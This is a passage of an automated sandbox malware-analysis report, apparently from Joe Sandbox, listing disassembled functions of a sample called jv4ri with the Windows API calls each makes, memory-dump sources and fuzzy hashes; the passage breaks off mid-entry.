                    Function 00CECDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c58cbd01db6cefca7bbf2b2fb2c6f6e77075e5be31def51023666956af6b698a
                    • Instruction ID: 2c338be9697390a6ec33c9edd21a2b7db1bfb20f926b24e6b039aa60ba32634d
                    • Opcode Fuzzy Hash: c58cbd01db6cefca7bbf2b2fb2c6f6e77075e5be31def51023666956af6b698a
                    • Instruction Fuzzy Hash: 8DF159716083419FC714DF29C480A6ABBE5FF88314F14896EF9AA9B351D731E946CF82
                    Function 00CE83A8 Relevance: 4.8, APIs: 3, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00CE83D8
                    • VariantInit.OLEAUT32(?), ref: 00CE83EE
                    • VariantClear.OLEAUT32(?), ref: 00CE86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$ClearInitInitialize
                    • String ID:
                    • API String ID: 4200086340-0
                    • Opcode ID: 4eb2760040a8a8de99561eae3c025bfb177bf5ef9c4b692c6c29fa066425b71a
                    • Instruction ID: f5615b28686464ff4b31571a42216c7221b379951b150f16d70db0069984c14f
                    • Opcode Fuzzy Hash: 4eb2760040a8a8de99561eae3c025bfb177bf5ef9c4b692c6c29fa066425b71a
                    • Instruction Fuzzy Hash: A5A115752047419FDB10DF26C895B2ABBE4FF88724F148459FA9A9B3A1CB30ED04DB52
                    Function 00C7F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C903D3
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C903DB
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C903E6
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C903F1
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C903F9
                      • Part of subcall function 00C903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C90401
                      • Part of subcall function 00C86259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00C862B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C7FB2D
                    • OleInitialize.OLE32(00000000), ref: 00C7FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00CB49F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                    • String ID:
                    • API String ID: 3094916012-0
                    • Opcode ID: 5a4b9291823a4b1287c00b4b31f0369e002b87bff1c3d488954bdea9396aa155
                    • Instruction ID: 12562c400249a8ea3773538399bf3da5882fbba6b1646ab5fe084b10616b8e39
                    • Opcode Fuzzy Hash: 5a4b9291823a4b1287c00b4b31f0369e002b87bff1c3d488954bdea9396aa155
                    • Instruction Fuzzy Hash: 6C8195B0D09340AEC784EF3AED456657AE4EB9A708714C13AE119CB362EB71C405DF75
                    Function 00C743DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00C74401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C744A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C744C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: e90db378b534aabca96e5b7c78cd443dde359b804948cd875b629adfacbe759f
                    • Instruction ID: d2285bfaa81d2d99334e3e6a2626d9b4044d117691480f1cc88a7783cd0a4e4e
                    • Opcode Fuzzy Hash: e90db378b534aabca96e5b7c78cd443dde359b804948cd875b629adfacbe759f
                    • Instruction Fuzzy Hash: E3318EB05043019FD724DF24D8847ABBBE8FB49308F00492EF59AC3251D771AA44DB96
                    Function 00C9594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9A3AB: __NMSG_WRITE.LIBCMT ref: 00C9A3D2
                      • Part of subcall function 00C9A3AB: __NMSG_WRITE.LIBCMT ref: 00C9A3DC
                    • __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9A408: GetModuleFileNameW.KERNEL32(00000000,00D343BA,00000104,00000000,00000001,00000000), ref: 00C9A49A
                      • Part of subcall function 00C9A408: ___crtMessageBoxW.LIBCMT ref: 00C9A548
                      • Part of subcall function 00C932DF: ___crtCorExitProcess.LIBCMT ref: 00C932E5
                      • Part of subcall function 00C932DF: ExitProcess.KERNEL32 ref: 00C932EE
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 5a3f82de58c878f9978eb32721f7099f64ca79e45f0c66971432cdf68f1bf487
                    • Instruction ID: 9b088bc4c5347145e34d0905bce9e29da0b16b44c2315d1936c9f6ac430a1edc
                    • Opcode Fuzzy Hash: 5a3f82de58c878f9978eb32721f7099f64ca79e45f0c66971432cdf68f1bf487
                    • Instruction Fuzzy Hash: A801F536201B12EEFE222B25DC4EB2E72489F42734F12002AF515EB2C1DE709E029775
                    Function 00CD9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CD97D2,?,?,?,?,?,00000004), ref: 00CD9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CD97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CD9B5B
                    • CloseHandle.KERNEL32(00000000,?,00CD97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CD9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: baa222f9e43b9b00745898de99b995b0106d5544d99c6674a074e74988bbafc2
                    • Instruction ID: f93441f50f687256a83bd0913226a407ded6b380ecc72cec7abde8bee08a4cec
                    • Opcode Fuzzy Hash: baa222f9e43b9b00745898de99b995b0106d5544d99c6674a074e74988bbafc2
                    • Instruction Fuzzy Hash: 97E08632180214B7EB311B54EC09FEE7B18EF05761F148125FB24690E087B12622D799
                    Function 00CD8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00CD8FA5
                      • Part of subcall function 00C92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C99C64), ref: 00C92FA9
                      • Part of subcall function 00C92F95: GetLastError.KERNEL32(00000000,?,00C99C64), ref: 00C92FBB
                    • _free.LIBCMT ref: 00CD8FB6
                    • _free.LIBCMT ref: 00CD8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                    • Instruction ID: 57abf70ee0f66ef2b31bf26b1e0ef0421f5da7ef0ea9be2923c427a3900082b2
                    • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                    • Instruction Fuzzy Hash: ABE0C2A12087106ACE20A7F8AD44A9327EE0F48350B08080EB559DB242CE24F940A024
                    Function 00C7AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 767c2fb362de2d88ac760203902184f1e4f2d9879ebf83d48d68fad712fc8e90
                    • Instruction ID: 44c7515dcf80fc782281daf7a1bf0315ef101f2175921610000b0cffc0a5e6e0
                    • Opcode Fuzzy Hash: 767c2fb362de2d88ac760203902184f1e4f2d9879ebf83d48d68fad712fc8e90
                    • Instruction Fuzzy Hash: AA222674508241DFCB28DF15C495B6ABBE1FF84304F24896DE89A8B362D731ED85DB82
                    Function 00C74DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    • Opcode ID: a45f858b7cd6eeee7e42c58f234d3e95784b31552cad7c1cee4d65d5844958a3
                    • Instruction ID: 60f0ba074e48ff9a4b33ee72469494f034d2db59fd7978563fe11637b18775cd
                    • Opcode Fuzzy Hash: a45f858b7cd6eeee7e42c58f234d3e95784b31552cad7c1cee4d65d5844958a3
                    • Instruction Fuzzy Hash: 9E419E31A04554ABCF295F65C8517BEFFA6AF06320F68C065FC8A9B282C7718E4093E1
                    Function 00C77BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: f6cfc7aabcd9ef25bb477b1bf5529409e97e1c531100b3aa86aac32bc5d8bba1
                    • Instruction ID: 9c5efeef65dc4b0211129bd27967f8cf0791fe17c5e4f8100ac652fee00d64a6
                    • Opcode Fuzzy Hash: f6cfc7aabcd9ef25bb477b1bf5529409e97e1c531100b3aa86aac32bc5d8bba1
                    • Instruction Fuzzy Hash: 5531E5B160450AAFC714DF68C8D1E69F3A9FF48320715C769E929CB291DB30E960CB90
                    Function 00C7492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • 745AC8D0.UXTHEME ref: 00C74992
                      • Part of subcall function 00C935AC: __lock.LIBCMT ref: 00C935B2
                      • Part of subcall function 00C935AC: RtlDecodePointer.NTDLL(00000001), ref: 00C935BE
                      • Part of subcall function 00C935AC: RtlEncodePointer.NTDLL(?), ref: 00C935C9
                      • Part of subcall function 00C74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C74A73
                      • Part of subcall function 00C74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C74A88
                      • Part of subcall function 00C73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C73B7A
                      • Part of subcall function 00C73B4C: IsDebuggerPresent.KERNEL32 ref: 00C73B8C
                      • Part of subcall function 00C73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D362F8,00D362E0,?,?), ref: 00C73BFD
                      • Part of subcall function 00C73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C73C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C749D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                    • String ID:
                    • API String ID: 2688871447-0
                    • Opcode ID: cbb683a51204301c59702a16ec86e1c07c09a806f61044e04720f6953cf2eb9e
                    • Instruction ID: bda4f82f88a85f461e35a6f8c43ef35dfa0714d25ce99c63611a4947a06b14e2
                    • Opcode Fuzzy Hash: cbb683a51204301c59702a16ec86e1c07c09a806f61044e04720f6953cf2eb9e
                    • Instruction Fuzzy Hash: CD116A71908311ABC700EF69DC4591AFBF8EB99750F00C52EF499C32A2DB709645DBA6
                    Function 00C9582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: fea6d6316eba606a8774257ecadfca4d8084690f09df907e1e368bb3c131b207
                    • Instruction ID: 3f2ba0767ef7701e1b74c6df45cdef79dbe106c70bf747220a64dd0c801c3ad1
                    • Opcode Fuzzy Hash: fea6d6316eba606a8774257ecadfca4d8084690f09df907e1e368bb3c131b207
                    • Instruction Fuzzy Hash: 48018F71C40A09EFCF23AF699C0E99E7B61AF81760F148215F8245B1E1DB318B21EB95
                    Function 00C955D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C98D68: __getptd_noexit.LIBCMT ref: 00C98D68
                    • __lock_file.LIBCMT ref: 00C9561B
                      • Part of subcall function 00C96E4E: __lock.LIBCMT ref: 00C96E71
                    • __fclose_nolock.LIBCMT ref: 00C95626
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: cbc28f8bb51b44ab537194e9bd109af76e6cb096074ce21651909ced86b09b5b
                    • Instruction ID: 47ec93926602d4564a00946c81f0675823940d54d0fe47ddc4b9f85989bbad2c
                    • Opcode Fuzzy Hash: cbc28f8bb51b44ab537194e9bd109af76e6cb096074ce21651909ced86b09b5b
                    • Instruction Fuzzy Hash: ECF0B471901A05DBDF22BF769C0E76E7BA16F41334F558209F424AB2C1CF7C8A05AB55
                    Function 00C7F3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20c71d825b5bf49f35fe926f10c0fb44b18647379e05c4d5bbfcc58dd2a9fe03
                    • Instruction ID: 3a2ff8d9868a8868e786c427359c2a082aa06b21229fd56e62a21433c1c004bc
                    • Opcode Fuzzy Hash: 20c71d825b5bf49f35fe926f10c0fb44b18647379e05c4d5bbfcc58dd2a9fe03
                    • Instruction Fuzzy Hash: 47618A7060420A9FDB24DF64C981ABAB7F5EF44300F14C47DE91A9B242EB71EE52DB51
                    Function 03141070 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 031408E0: GetFileAttributesW.KERNELBASE(?), ref: 031408EB
                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0314119F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2027121117.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3140000_jv4ri.jbxd
                    Similarity
                    • API ID: AttributesCreateDirectoryFile
                    • String ID:
                    • API String ID: 3401506121-0
                    • Opcode ID: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                    • Instruction ID: bdac22c5ef1bd912c6350f878348d901d5c37f77020bac865f3719b88108bdfd
                    • Opcode Fuzzy Hash: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                    • Instruction Fuzzy Hash: 52518631A1020997DF14EFB0C954BEF7379EF5C700F0045A9A609E7180EB799B45CBA5
                    Function 00CB00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: a3f3cd95af7fcff83c4258088012220ad73dce10f1ad6c8dc94a73e8a5e4ff5f
                    • Instruction ID: 73a6849603174924aa957ae2c814ce1e203399fcd14fdc49bd4f61d0e689395f
                    • Opcode Fuzzy Hash: a3f3cd95af7fcff83c4258088012220ad73dce10f1ad6c8dc94a73e8a5e4ff5f
                    • Instruction Fuzzy Hash: 8F411874508341CFDB24DF14C484B1ABBE0BF85318F19899CE99A4B362D332EC85CB52
                    Function 00C77CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
